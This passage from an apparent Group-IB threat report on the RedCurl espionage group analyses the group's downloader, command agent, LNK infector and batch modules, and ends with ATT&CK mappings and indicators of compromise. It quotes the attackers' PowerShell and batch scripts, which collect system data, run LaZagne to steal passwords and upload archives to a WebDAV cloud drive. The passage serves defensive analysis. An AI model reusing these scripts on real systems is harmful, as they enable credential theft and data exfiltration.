bytes\r\nof the SHA256 hash of the password were used as the decryption\r\nkey. The password itself was a concatenation of two strings. The\r\napplication received the first string as a parameter, while the second\r\nstring was located in the malware body.\r\nBefore launch, the application checked for an Internet connection.\r\nThe following string was used as the User-Agent: Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12. The check\r\nwas completed by sending a GET request to a randomly chosen\r\ndomain from the following list:\n\n22\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nIf the application received the 200 status code (Success)\r\nin response, it collected the following information about the infected\r\ndevice:\r\n1. Computer name\r\n2. Domain name\r\n3. User name\r\n4. Time zone\r\n5. Content list of the following directories: %PROGRAMFILES%,\r\n%DESKTOP% and %LOCALAPPDATA%. It should be noted\r\nthat only the directory list was saved from the directories\r\n%LOCALAPPDATA% and %PROGRAMFILES%, while the\r\ndirectory %DESKTOP% was also used to collect files.\r\nNext, all the information was sent to the C2 server with a POST\r\nrequest and using a predefined User-Agent: Mozilla/5.0 (Windows\r\nNT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/42.0.2311.135 Safari/537.36 Edge/12.246001. The\r\nrequest had quite an unusual format:\r\n%RANDOM_STRING%=BASE64(%COMPUTERNAME%)\u0026%RANDOM_STRING%=BASE64(%DO-MAINNAME%)\u0026%RANDOM_STRING%=BASE64(%USERNAME%)\u0026%RANDOM_\r\nSTRING%=%UNKNW_INT%\u0026%RANDOM_STRING%=BASE64(%LIST_OF_FILES%)\r\n• www.msn.com\r\n• www.google.com\r\n• www.yahoo.com\r\n• google.co.uk\r\n• tmall.com\r\n• www.microsoft.com\r\n• www.wikipedia.org\r\n• www.reddit.com\r\n• www.bing.com\r\n• www.amazon.com\r\n• www.taobao.com\r\nIn the case above, %RANDOM_STRING% is a string made\r\nup of random symbols generated according to the following\r\ntemplate: [a-z]{5,19}. We would like to draw attention to the field\r\n%UNKNW_INT%.\r\nThe group’s older tools checked the time zone. If the infected\r\nsystem’s time zone was set to UTC-08:00 or UTC+01:00, the\r\nmodules would stop working: these time zones are often used\r\nin various sandboxes by default, which is why it is a relatively easy but\r\neffective way to prevent the application from being analyzed. In the\r\nsamples we analyzed, the check in question was not performed,\r\nbut the described field was filled in with a random number from\r\nthe interval [0, 23], which fell within the interval for the time zone.\r\nWe assume that the hackers decided to remove the check from\r\nthe client side and implement it on the server side. It is possible\r\nthat they were unable to implement the functionality due to tight\r\ndeadline and that it will be featured in the group’s future attacks.\n\n23\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nRedCurl.Downloader contains two C2 addresses: a main one\r\nand a backup one. The latter was used only when the former failed\r\nto respond. The next stage, RedCurl.Extractor, was downloaded from\r\nthe same C2 server to which information about the infected system\r\nwas sent. The application saved the obtained file under a name that\r\nfit the template %APPDATA%\\[a-z]{10}.[a-z]{3}, loaded it onto its own\r\nprocess (Extractor is a DLL file), and called the MainDll function. After\r\nExtractor had been executed, it was deleted from the infected system.\r\nRedCurl.Extractor is a DLL file equivalent to RedCurl.Dropper,\r\nwhich extracted the file of the legitimate 7z utility and another\r\nof the group’s new tools: RedCurl.FSABIN. The dropper itself did not\r\nperform any network communications. Both files as well as the data\r\ndecryption key were contained in the body of RedCurl.Extractor\r\nin encrypted form.\r\nBefore extracting the payload, Extractor created a directory\r\nin %LOCALAPPDATA%. It is noteworthy that the name of the created\r\ndirectory mimicked the name of the system folder. For example:\r\n• MemoryDiagnosticServices\r\n• AppIDStorage\r\n• Provision\r\nThereafter, both files were saved in the new directory under the fol-lowing names:\r\n• For the 7z utility: %[a-z]{2,3}%%MD5(%USERNAME%)[16:]%.exe\r\n• For the RedCurl.FSABIN module: %[a-z]{2,3}%%MD5(%COM-PUTERNAME%)[16:].dll%\r\nRedCurl.FSABIN was launched through a task that repeated once\r\nan hour. The part of the password sent for decrypting data inside\r\nthe module was used as the launch argument.\r\nRedCurl.\r\nExtractor\r\nFig. 10. Example of information about the infected device sent by RedCurl.\r\nDownloader\n\n24\n© GROUP−IB\nTools\nREDCURL: THE AWAKENING\nRedCurl.\nFSABIN\nBefore describing the tool, we will present the overall pattern for\nreceiving and executing a command:\nThe module is a binary equivalent of RedCurl.FirstStageAgent, but\nwith two main differences:\n1. The new tool cannot launch RedCurl.Channel1 or RedCurl.\nChannel2.\n2. RedCurl.FSABIN receives commands not from public storage\ndrives, but from HTTP servers controlled by the hackers.\nThe tool is launched using repeated tasks. Below is an example\nof a task name:\nMUI\\LPRemove_%PIECE_OF_HASH%, where %PIECE_OF_\nHASH% is MD5(%USERNAME%)[16:])\nBelow is an example of a created task:\nDownloads,\ndecrypts,\nexecutes\ncommands\nCollects\ninformation,\ncreates archive\non cloud disk\nMounts\nclouB\ndisc\nDocs Credentials SYS\ninformation\nCollected ^les\n7z archive with password\nWebDAV\nFSABIN/\nC}ABIN/\nC}ABIN\nDOC\nEXE\nSYS\nCOMMANDS\n\u003c/\u003e\nHTTP\nFig. 11. Diagram of RedCurl.FSABIN command execution\nFig. 12. Example of a task used to launch RedCurl.FSABIN\n\n25\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nThe network part of the tool has a lot in common with RedCurl.\r\nDownloader: both modules contain two C2 addresses\r\nin encrypted form. The password for decrypting this type of data\r\nis concatenated from two strings: a part built into the module and\r\nthe application’s launch argument. The module itself is responsible\r\nsolely for downloading and executing commands, but even\r\nthis single functionality makes it a flexible and dangerous tool\r\nin a hacker’s arsenal. Another similarity with RedCurl.Downloader\r\nis the mechanism for checking for an Internet connection.\r\nAfter checking for an Internet connection, the application checked\r\nthe name of the process in in whose context it was launched. If the\r\nname was not svchost.exe or services.exe, RedCurl.FSABIN\r\nstopped working. The module received the command by sending\r\na POST request. The request body contained the names of the\r\nuser and computer on which the malicious file was launched. At this\r\npoint, we once again come across a feature similar to RedCurl.\r\nDownloader: the message was formed based on a similar pattern:\r\nThe process of receiving the command from the server can\r\nbe divided into two stages:\r\n1. Information about the infected device was sent and the\r\nencrypted command was received\r\n2. Random data was sent to the server and the decryption key\r\nwas received.\r\nThe pattern for receiving the command is as follows:\r\n[a-zA-Z0-9]{5,14}=BASE64(%COMPUTERNAME%)\u0026[a-zA-Z0-9]{5,14}=BASE64\r\n(%USERNAME%)\r\n(#\r ,\r*)\r*\r\n (\n\n(\n\n'\n!\r\u0026\r\nWhen making both requests (for the command and the\r\npassword), the application used one and the same User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135\r\nSafari/537.36 Edge/12.246001. In the first message, the\r\napplication sent information about the infected device to the\r\nserver and received the encrypted command in response. If the\r\ncommand was received successfully, a POST request was made\r\nwith a parameter generated based on the following pattern: [a-zA-Z0-9]{5,14}=[a-zA-Z0-9]{5,14} (although we currently do not know\r\nhow the data sent was used by the hackers). In response to the\r\nrequest, the server sent a password. Based on this password,\r\nFig. 13. Diagram of RedCurl.FSABIN receiving commands from the server\n\n26\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\na decryption key was generated for the command. This is where\r\nwe encountered another anti-debugging method: before the\r\ncommand was decrypted and launched, the IsDebuggerPresent\r\nfunction was called. As the name suggests, the function\r\ndetermines whether the application is being debugged. If the\r\nresult was true, the module terminated itself. Overall, decrypting\r\nand executing the command occurred as follows:\r\n1. From the second string-response (the password), RedCurl.\r\nFSABIN calculated the value of SHA256, with the first 16 bytes\r\nof the hash sum used as the key.\r\n2. RedCurl.FSABIN decrypted the received command (the\r\nfirst response from the server) using the key from the previous\r\nstep. AES-128 СВС was used as the decryption algorithm.\r\n3. RedCurl.FSABIN saved the decrypted command to the\r\npathway %LOCALAPPDATA%\\%FSA_FOLDER%\\[a-zA-Z0-9]\r\n{5,14}.bat.\r\n4. RedCurl.FSABIN searched for the 7z utility in the directory\r\nwith the module. If the utility was found, the application set\r\nup the environment variable syspack. The executable file\r\n- 7z utility - was renamed every time RedCurl.FSABIN was\r\nlaunched. The names were generated according to the\r\ntemplate [a-z]{8,15}.\r\n5. RedCurl.FSABIN launched the command by calling the\r\nfunction ShellExecute().\r\n6. The command sent the information (collected while\r\nexecuting the command) through the WebDav protocol\r\nto a cloud drive.\n\n27\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nIn addition to executing commands, the old PowerShell version\r\nof RedCurl.FirstStageAgent was responsible for launching the\r\nRedCurl.Channel1 and RedCurl.Channel2 modules. The new\r\n(binary) version does not have these functionalities. However, during\r\nincident response activities, we discovered updated versions\r\nof Channel1 and Channel2 on the infected devices. In terms\r\nof functionality, RedCurl.CHABIN1 is no different from RedCurl.\r\nFSABIN, with RedCurl.CHABIN2 differing only in that it determines\r\nthe settings of the proxy server in the system and uses them\r\nto connect to the servers used by the hackers. Communicating with\r\nthe server involves using the libcurl library functions as opposed\r\nto Windows API functions.\r\nIt should be noted that initially the modules FirstStageAgent\r\nand Channel1 in no way differed from each other regarding\r\ncommunication with the hackers. Communication took place\r\nthrough the curl utility. The Channel2 module received the\r\ncommand by mounting the network drive in the system. Before the\r\nmajor update, which we are looking into as part of this investigation,\r\nthe way that the Channel1 module received the command had been\r\nchanged. The module made the request by creating a COM object:\r\nMSXML2.XMLHTTP. This meant that each module was implemented\r\ndifferently, which ensured a high level of independence. As far\r\nas we can tell at the moment, the CHABIN1 module we discovered\r\nseems to simply be a fork of the FSABIN module. In the future,\r\nCHABIN1 could be updated like its predecessor, but currently the\r\nmodule makes it possible to “parallelize” the way that commands\r\nare processed on infected devices.\r\nThe modules in question are used exclusively as an alternative\r\nchannel for controlling the device and are needed if for any reason\r\nFSABIN cannot perform its functionalities. In such cases, the\r\nhackers continue to manage the device using Channel1 and/\r\nor Channel2. Unfortunately, at the time of writing this report, the log\r\ndata that could have helped us determine exactly how the modules\r\nin question were delivered to the infected device was not saved.\r\nWe assume that the modules were delivered to devices that were\r\ncritical for the attackers through the command.\r\nRedCurl.\r\nСHABIN1\r\nand RedCurl.\r\nСHABIN2\n\n28\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nAs indicated above, the lateral movement within an organiza-tion’s infrastructure involves creating LNK files disguised as internal\r\ndocuments on shared network drives. This tool was used in the\r\ngroup’s previous attacks, but it underwent significant changes.\r\nUnfortunately, our investigation did not reveal which exact tool\r\nin RedCurl’s arsenal was used to infect network drives. Based\r\non our experience in monitoring the group’s activities, however,\r\nwe can assume with a high level of confidence that the drives were\r\ninfected through a command.\r\nFirst, a zero-size file named %GUID_PATTERN%.git was delivered\r\nto the infected network drive (we discovered the file in the form\r\nof a WIM image). The file contained five alternative data streams,\r\namong which were four images (for files with the extensions doc, jpg,\r\npdf, xls) and one stream made up of the modified module RedCurl.\r\nExtractor. Files with images were used as icons for the LNK files\r\ncreated.\r\nAfter discovering a potentially interesting document, the script\r\nresponsible for infecting the network drive hid that document from\r\nthe user and created an LNK file with the same name. When the user\r\nopened the malicious LNK file, the latter in turn launched RedCurl.\r\nExtractor with the argument -file followed by the path to the original\r\ndocument, launched by RedCurl.Extractor:\r\nshell32.dll,Control_RunDLL “\\%SHARES%\\%DIR%\\%GUID%.git:%RC_DROPPER_\r\nNAME%.dll” -file=%ORIG_DOC_NAME%\r\nThis means that when a user opened the LNK file from the network\r\ndrive, RedCurl.Extractor was launched on the device; RedCurl.\r\nExtractor in turn launched the original document. Below is the\r\noutcome of the work done by the stream utility:\r\nLNK file infector\r\nFig. 14. Contents of the .git file\n\n29\r\n© GROUP−IB\r\nC ommands\r\nREDCURL: THE AWAKENING\r\nCommands\r\nAs in past attacks, RedCurl.Commands modules are batch scripts\r\nthat enhanced functionality and helped take any actions on infected\r\ndevices. Their functionalities were limited only by the functionalities\r\nof the Windows command interpreter in the sense that they gave\r\nthe attackers unlimited control over the infected device.\r\nAs with past versions, commands still saved the result of their work\r\non legitimate cloud drives in passworded archives; these are the\r\nonly tools in RedCurl’s arsenal not to have been moved to free\r\nweb hosting services. To create the archives, the hackers used\r\nthe 7z utility, which they delivered to the infected system using the\r\nRedCurl.Extractor module, while the password for the archive was\r\nsaved in the command body. The hackers also continued to use\r\nthe tools LaZagne (https://github.com/AlessandroZ/LaZagne)\r\nand ADExplorer (https://docs.microsoft.com/en-us/sysinternals/\r\ndownloads/adexplorer). Files were uploaded to a cloud drive using\r\nPowerShell commands, which were duplicated several times in one\r\nmodule.\r\ngci $env:appdata -recurse -force | Out-File .\\%tdircurl%\\!!_$env:co\r\nmputername.tmp;\r\n$IsProxy = $True;\r\n$var_paramproxy_01=(new-object System.Net.WebClient).Proxy.\r\nGetProxy(‘http://www.msn.com’).OriginalString;\r\nif ($var_paramproxy_01 -eq ‘http://www.msn.com’) {$IsProxy =\r\n$False};\r\n$PS_WEBCLIENT_01 = New-Object -ComObject MSXML2.XMLHTTP;\r\nif ($IsProxy -eq $True){\r\n$PS_WEBCLIENT_01.setProxy(2, $var_paramproxy_01,’’);\r\n};\r\n$ADO_FILE_STREAM = New-Object -ComObject ADODB.Stream;\r\n$ADO_FILE_STREAM.Open();\r\n$ADO_FILE_STREAM.Type = 1;\r\nGet-ChildItem “.\\%tdircurl%” | Where-Object {\r\n $_.PSIsContainer -eq $false;\r\n} | foreach {\r\n$ADO_FILE_STREAM.LoadFromFile($_.FullName);\r\n$ADO_FILE_BUFFER = $ADO_FILE_STREAM.Read();\r\n$PS_WEBCLIENT_01.Open(‘PUT’, ‘%davstr%/%davfld%/’+$_.Name,\r\n$False, ‘%slog%’, ‘%spass%’);\r\n$PS_WEBCLIENT_01.Send($ADO_FILE_BUFFER);\r\n};\r\n$PS_WEBCLIENT_01.Close;\r\nri .\\%tdircurl% -recurse -force;\n\n30\r\n© GROUP−IB\r\nC ommands\r\nREDCURL: THE AWAKENING\r\nAs in past versions, some commands contained a stop list made\r\nup of devices that the hackers were not interested in (it contained\r\ncomputer names). In the past, the check was carried out on the\r\nclient side because commands were placed on a public service\r\ndrives, so it was impossible to check on which exact device the\r\ncommand would be executed. In recent attacks, the check could\r\nbe performed on the server side as the commands were received\r\nfrom controlled web hosting services. RedCurl ignored the\r\noption, however, once again most likely due to the tight deadline\r\nfor developing tools. If the computer name was on the stop list,\r\nthe module with the command terminated itself. All necessary\r\ninformation such as archive passwords, login details including the\r\npassword and the address of the cloud service could be found\r\nat the start of the file in non-encrypted form.\r\nif %pc%==%computername% goto start\r\nset pc=SOME_COMPUTERNAME\r\nif %pc%==%computername% goto start\r\ngoto stop\r\n:start\r\nif not defined syspack set syspack=syspack.exe\r\nset mlog=”login”\r\nset mpass=”pass”\r\nset packpass=”packpass”\r\nset packpass2=”packpass2”\r\nset davfld=PBX\r\nset davstr=hXXps://dav.box[.]com/dav\r\nset dnfile=lz243p.tmp\r\nWhen they were launched, commands created temporary\r\ndirectories to save the results of their work. The folder with the\r\nRedCurl.FSABIN module acted as a working directory. Directory\r\nnames were generated according to the template: temp[0-9]\r\n{2,4}. Information about the infected device was collected using\r\nstandard utilities. Outcomes were sent to files in the temporary\r\ndirectory where the module was located.\r\nmkdir temp051\r\nsysteminfo\u003e\u003etemp051\\sys.txt\r\nwhoami /ALL\u003e\u003etemp051\\whoami.txt\r\nnet use\u003e\u003etemp051\\net.txt\r\nwmic logicaldisk get description,name,Size\u003e\u003etemp051\\disks.txt\r\nThe command was a batch script, but it was able to have\r\na PowerShell script built in. For example, the list of files and folders\r\ncan be collected using the following commands:\r\nGet-ChildItem “C:\\” -Recurse -Force | Out-File -FilePath “.\\\r\ntemp051\\C.tmp”;\r\nGet-ChildItem “D:\\” -Recurse -Force | Out-File -FilePath “.\\\r\ntemp051\\D.tmp”;\n\n31\r\n© GROUP−IB\r\nC ommands\r\nREDCURL: THE AWAKENING\r\nThe information collected was added to the passworded archive\r\nand sent to the server using the abovementioned script.\r\nset tdircurl=temp%random%\r\nmkdir %tdircurl%\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_\r\ninf_%random%.tmp temp051\r\nTake note of the ppass variable, we will come back to it. After\r\ncollecting basic information about the system, the command\r\ndownloaded the archive with the necessary utilities from the same\r\nnetwork drive.\r\n$IsProxy = $True;\r\n$var_paramproxy_01=(new-object System.Net.WebClient).Proxy.\r\nGetProxy(‘http://www.msn.com’).OriginalString;\r\nif ($var_paramproxy_01 -eq ‘http://www.msn.com’) {$IsProxy =\r\n$False};\r\n$PS_WEBCLIENT_01 = New-Object -ComObject MSXML2.XMLHTTP;\r\nif ($IsProxy -eq $True) {\r\n$PS_WEBCLIENT_01.setProxy(2, $var_paramproxy_01,’’);\r\n};\r\n$PS_WEBCLIENT_01.Open(‘GET’, ‘%davstr%/%davfld%/%dnfile%’, $False,\r\n‘%mlog%’, ‘%mpass%’);\r\n$PS_WEBCLIENT_01.Send();\r\nif($PS_WEBCLIENT_01.status -ne “404”) {\r\n$PS_WEBCLIENT_01.responseBody | Set-Content ‘.\\%dnfile%’\r\n-Encoding Byte;\r\n};\r\nIf the download was successful, the command continued with its\r\nexecution. Files were extracted from the archive and LaZagne was\r\nlaunched using the Python interpreter. Data extracted using the\r\nutility was added to the passworded archive and sent to a cloud\r\ndrive.\r\nif not exist %dnfile% goto end2\r\n \r\n%syspack% x -aoa -p%packpass2% %dnfile% -opython2\r\ndir python2\u003e\u003etemp028\\log.txt\r\ndir python2\\lz\u003e\u003etemp028\\log1.txt\r\ncd python2\r\npython.exe lz\\lz.py all\u003e\u003e..\\temp028\\pw.txt 2\u003e\u00261\r\ntimeout /T 10\r\npython.exe lz\\lz.py all\u003e\u003e..\\temp028\\pw1.txt\r\ntimeout /T 10\r\ncd ..\\\r\n \r\nset tdircurl=temp%random%c\r\nmkdir %tdircurl%\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_\r\nps_%random%.tmp temp028\n\n32\r\n© GROUP−IB\r\nC ommands\r\nREDCURL: THE AWAKENING\r\nAfter the work was completed, all the created directories and\r\nmodules were deleted.\r\nrd /S /Q %tdircurl%\r\ndel /F /Q ade.tmp\r\nrd /S /Q temp011\r\ndel /F /Q lz243p.tmp\r\nrd /S /Q temp028\r\nrd /S /Q python2\r\n:stop\r\ndel %0\r\n:end2\r\ndel %0\r\nNow comes a particularly interesting part. Earlier we asked you\r\nto take note of the ppass variable. The fact is that the above\r\nmentioned script does not set this variable, and the variable is not\r\nin the system by default. Once again we assume that the attackers\r\nwere rushed when creating the modules and made a logic error: the\r\nvariable packpass should have been used instead of ppass:\r\n...\r\nset packpass=TiIualLARZAX30nfY1hstcLo2sS5PmWKLPy6ZOzuS2\r\n...\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_\r\ninf_%random%.tmp temp051\r\n...\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_\r\nps_%random%.tmp temp028\r\n...\r\nDue to the environment variable being set incorrectly, the string\r\n%ppass% was used as the password and not the TiIualLARZAX30\r\nnfY1hstcLo2sS5PmWKLPy6ZOzuS2 string.\r\nAs indicated above, the victim organization noticed that malicious\r\nLNK files had been created on network drives. This means that\r\nat least one more updated command was involved in the attack: ins/\r\ninst. Unfortunately, it was impossible to retrieve all the commands\r\nused as part of the two attacks.\n\n33\r\n© GROUP−IB\r\nCon c lus i o n\r\nREDCURL: THE AWAKENING\r\nConclusion\r\nLast year, Group-IB specialists announced for the first time that they\r\nhad discovered a new Russian-speaking hacker group that they had\r\nnamed RedCurl. Between 2018 and 2020, we identified 26 attacks\r\ncarried out by the group and 14 victim organizations in various indus-tries. Seven months later, in 2021, the attacks resumed. This time\r\nwe uncovered four attacks. In two of them, the identified victim was\r\nattacked twice. After a long break, the group returned to the cyber\r\nespionage scene. Our Threat Intelligence \u0026 Attribution system has\r\ndetected the group’s updated tools being used in the wild with\r\nincreased frequency. This means that more and more companies\r\ncould fall victim to the group, which conducts thoroughly planned,\r\ntargeted attacks on companies in order to steal confidential docu-ments. The Group-IB Threat Intelligence team continues to monitor\r\nRedCurl’s activity. However, the group has resumed its attacks and\r\nfor this reason, we have shared a list of basic recommendations\r\nthat IT and security teams should follow, regardless of a compa-ny’s size and field of activity. Our goal is to help companies minimize\r\nthe likelihood of becoming a victim and make sure that their assets\r\nare protected against RedCurl.\r\nTo better understand the techniques, tactics, and procedures\r\nused by RedCurl in its attacks, as usual we have published the\r\nMITRE ATT\u0026CK (Adversarial Tactics, Techniques \u0026 Common Knowl-edge) matrix. The data it contains is based on our own experience\r\nin responding to and analyzing the group’s attacks.\n\n34\r\n© GROUP−IB\r\nMITRE ATT\u0026CK® (R ed C url )\r\nREDCURL: THE AWAKENING\r\nTactic Technique Procedure\r\nTA0001: Initial Access T1566.002:\r\nSpearphishing link\r\nThe attackers used phishing emails with links to SFX archives\r\ncontaining malicious LNK files in order to gain initial access to the\r\ntarget host.\r\nTA0002: Execution T1204.002:\r\nMalicious File\r\nVictims must open the malicious LNK, XLAM, MHT or JS file to begin\r\nthe compromise process.\r\nT1059.003: Windows\r\nCommand Shell\r\nThe attackers used cmd.exe to execute batch scripts.\r\nT1059.001:\r\nPowerShell\r\nThe attackers used PowerShell scripts while performing post-exploitation tasks.\r\nTA0003: Persistence Т1053.005:\r\nScheduled Task\r\nThe attackers created tasks in the Scheduler to ensure\r\npersistence on compromised systems.\r\nT1547.001: Registry\r\nRun Keys / Startup\r\nFolder\r\nThe attackers created entries in the HKCU\\Software\\Microsoft\\\r\nWindows\\CurrentVersion\\Run registry key to ensure persistence\r\non compromised systems.\r\nTA0005: Defense Evasion T1027: Obfuscated\r\nFiles or Information\r\nThe attackers used encryption and coded PowerShell commands\r\nin Base64.\r\nT1036.005: Match\r\nLegitimate Name\r\nor Location\r\nThe attackers disguised the scripts and tasks in the Scheduler\r\nusing names similar to the legitimate ones.\r\nT1070.004: File\r\nDeletion\r\nThe attackers deleted batch scripts immediately after they were\r\nexecuted.\r\nT1564.001: Hidden\r\nFiles and Directories\r\nThe attackers added the “hidden” attribute to malicious libraries\r\nand files that the malicious LNK files pointed to.\r\nT1218.011: Rundll32 The attackers used rundll32.exe to launch RedCurl.Downloader,\r\nRedCurl.FSABIN, RedCurl.CHABIN1 and RedCurl.CHABI2\r\nTA0006: Credential\r\nAccess\r\nT1003.001: LSASS\r\nMemory\r\nThe attackers used LaZagne to extract passwords from volatile\r\nmemory.\r\nT1555.003:\r\nCredentials from Web\r\nBrowsers\r\nThe attackers used LaZagne to extract passwords saved by web\r\nbrowsers.\r\nT1552.001:\r\nCredentials in Files\r\nThe attackers used LaZagne to extract passwords saved in files.\r\nT1552.002:\r\nCredentials\r\nin Registry\r\nThe attackers used LaZagne to extract passwords saved in the\r\nregistry.\r\nT1056.002: GUI\r\nInput Capture\r\nThe attackers used a phishing pop-up window made to look like\r\nMicrosoft Outlook to obtain authentication details.\r\nMITRE ATT\u0026CK® (RedCurl)\n\n35\r\n© GROUP−IB\r\nMITRE ATT\u0026CK® (R ed C url )\r\nREDCURL: THE AWAKENING\r\nTactic Technique Procedure\r\nTA0007: Discovery T1082: System\r\nInformation\r\nDiscovery\r\nThe attackers regularly collected information about the\r\ncompromised systems.\r\nТ1035: Network Share\r\nDiscovery\r\nThe attackers collected information about network drives available\r\nto compromised hosts.\r\nT1083: File and\r\nDirectory Discovery\r\nThe attackers collected information about files on local and\r\nnetwork drives.\r\nT1087.001: Local\r\nAccount\r\nThe attackers collected information about local accounts.\r\nT1087.002: Domain\r\nAccount\r\nThe attackers collected information about domain accounts.\r\nT1087.003: Email\r\nAccount\r\nThe attackers collected information about email accounts.\r\nTA0008: Lateral\r\nMovement\r\nT1080: Taint Shared\r\nContent\r\nThe attackers placed modified LNK files on network drives, which\r\nmade it possible for them to move laterally across the network.\r\nTA0009: Collection T1119: Automated\r\nCollection\r\nThe attackers used batch scripts to collect data.\r\nТ1005: Data from\r\nLocal System\r\nThe attackers collected data from local drives on the compromised\r\nsystems.\r\nТ1039: Data from\r\nNetwork Shared Drive\r\nThe attackers collected data from network drives.\r\nT1114.001: Local Email\r\nCollection\r\nThe attackers collected email correspondence.\r\nTA0011: Command\r\nand Control\r\nT1102: Web Service The attackers used legitimate web services to download malicious\r\nbatch scripts.\r\nT1071.001: Web\r\nProtocols\r\nThe attackers used HTTP, HTTPS and WebDav protocols to make\r\nnetwork connections.\r\nT1573.001: Symmetric\r\nCryptography\r\nThe attackers used AES-128 СВС to encrypt commands sent\r\nby the server.\r\nTA0010: Exfiltration T1020: Automated\r\nExfiltration\r\nThe attackers used batch scripts to exfiltrate data.\r\nT1537: Transfer Data\r\nto Cloud Account\r\nThe attackers used cloud storage systems to copy data.\n\n36\r\n© GROUP−IB\r\nI ndicators of compromise\r\nREDCURL: THE AWAKENING\r\nIndicators of compromise\r\nDomains:\r\nRedCurl.Downloader:\r\nRedCurl.Extractor:\r\nprosmanf.mygamesonline[.]org\r\nicnfgfoot.c1[.]biz\r\ngtdsvcop.atspace[.]eu\r\nplomfroutr.c1[.]biz\r\nFilename: %APPDATA%\\MTLK%COMPUTERNAME%\\paran%USERNAME%.dll\r\nMD5: 154770dbaffd98289e8e6d70bd59b2b9\r\nSHA1: 86b47e687e35b2a2cce185daf25fca7a0073b544\r\nSHA256: 13332ecfa468d7fd57ef373b372e0f98c9a8dc60e8a9570cb7a9c0437583338c\r\nPE Timestamp: Tuesday, 25.05.2021 06:25:11 UTC\r\nSize: 123904 bytes\r\nFilename: RSjHQ.dll\r\nMD5: 5adda7acabb5c3bb7ddf75a4ab6285c6\r\nSHA1: cabc5621cc4eed54be43b5b29fd6e4a25509105b\r\nSHA256: 713a21d878c61bd9eace2a2f32f654c8ebf1534ec45c3e47f62b000a96336700\r\nPE Timestamp: Tuesday, 29.06.2021 10:48:56 UTC\r\nSize: 123904 bytes\r\nFilename: %APPDATA%\\[a-z]{10}\\.[a-z]{3}\r\nMD5: fc55d2310e0831615d8c7c95ccb95325\r\nSHA1: 0dd8168510a6cc55dc2f2126c59d0951d966a87a\r\nSHA256: f635be0fc6ff1faf55a60fde5b3a0f273f1c8ed622e6915b9a2fb4ae0085b1d8\r\nPE Timestamp: Tuesday, 25.05.2021 11:50:34 UTC\r\nSize: 1025536 bytes\r\nMD5: 34232c3210df2251820692885a3b3128\r\nSHA1: 5a39a5269ba10fbc7fcadac9f01f54a2f14faee6\r\nSHA256: b850c56109ba9ecadd5a6af3b764482cc814f7adba24d5a5c60a710e97f2b65f\r\nPE Timestamp: Monday, 19.04.2021 13:52:20 UTC\r\nSize: 1029632 bytes\n\n37\r\n© GROUP−IB\r\nI ndicators of compromise\r\nREDCURL: THE AWAKENING\r\nFilename: %LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.dll\r\nMD5: d6f318f77d3399e12e3e17abcd45d1c5\r\nSHA1: 373d0a0896a64fe61c7e13664e8f5f322d639e2f\r\nSHA256: c0f04cefd10f1e65f342d9456a3cab4b2b1aab6523a4789147e6ef556a7e8585\r\nPE Timestamp: Tuesday, 25.05.2021 11:50:24 UTC\r\nSize: 130560 bytes\r\nFilename: %APPDATA%\\MUIControl\\[a-z0-9]+.dll\r\nMD5: b74963e673087369da5fbe113b131254\r\nSHA1: 26c5925ab6d08a62e05922a04500b648bc0453c5\r\nSHA256: 12ae4ed672f495619fa480477d4b83d058ad3764ecaf86cd490cd3ea689158bc\r\nPE Timestamp: Monday, 19.04.2021 13:51:57 UTC\r\nSize: 130560 bytes\r\nFilename: %LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.dll\r\nMD5: 2ba63190a59228000e4616c3bd716b49\r\nSHA1: 839504fe83ae756fd67a8a52a9a9c345b4fbb531\r\nSHA256: 2cbdda564a8e2cbcffdbab89b978cba561d42da1889de7c817d8e0cd663c3322\r\nPE Timestamp: Wednesday, 28.04.2021 11:12:59 UTC\r\nSize: 130560 bytes\r\nMD5: 44341aedca34426e87da9dad3f547c11\r\nSHA1: 38f90080c6a431eaf6ba947c6e85c3ce19380797\r\nSHA256: cceef032c86d7ebac083c6506506fee8dd83475a10853e11bb133d2ec70115fe\r\nPE Timestamp: Tuesday, 11.05.2021 09:44:12 UTC\r\nSize: 130560 bytes\r\nFilename: %APPDATA%\\AppIDStorage\\convpolchk_b816871.dll\r\nMD5: df8030fa5a34d22cb08a7814b63e282f\r\nSHA1: 01a9a93954a6ae1c66fe82388c862b192e61270f\r\nSHA256: 00d10d276f3684787302a826c44718af77ff41020e2fbaed24fbec893e1f2004\r\nPE Timestamp: Wednesday, 28.04.2021 10:29:31 UTC\r\nSize: 213504 bytes\r\nFilename: mouseinpsync_98ab1ee.dll\r\nMD5: 2d65238c24657d395309e5cd01d9a8b7\r\nSHA1: 2dfce2fbdd44468aca08bf912b2ac33081015366\r\nSHA256: d6b6211bf7725ebd9a221ba182320f2cf91a9a0a1b70f685e207be40278e8f80\r\nPE Timestamp: Thursday, 15.04.2021 11:55:38 UTC\r\nSize: 213504 bytes\r\nFilename: oobedscvr_cf25318.dll\r\nMD5: 58c3d684fecd62e3fd23f1d8a9fb0efb\r\nSHA1: e125d5585b30805860919930a7fb896b84a8c8b4\r\nSHA256: 2310a5e1710b34c140d5a8a29c182efdeae224262498f9c51b9eb1e2b1c9aa8a\r\nPE Timestamp: Tuesday, 11.05.2021 10:28:07 UTC\r\nSize: 213504 bytes\r\nRedCurl.FSABIN:\r\nRedCurl.CHABIN1:\n\n38\r\n© GROUP−IB\r\nI ndicators of compromise\r\nREDCURL: THE AWAKENING\r\nFilename: %APPDATA%\\Microsoft\\Provision\\cellprovcntrl_0877cae.exe\r\nMD5: 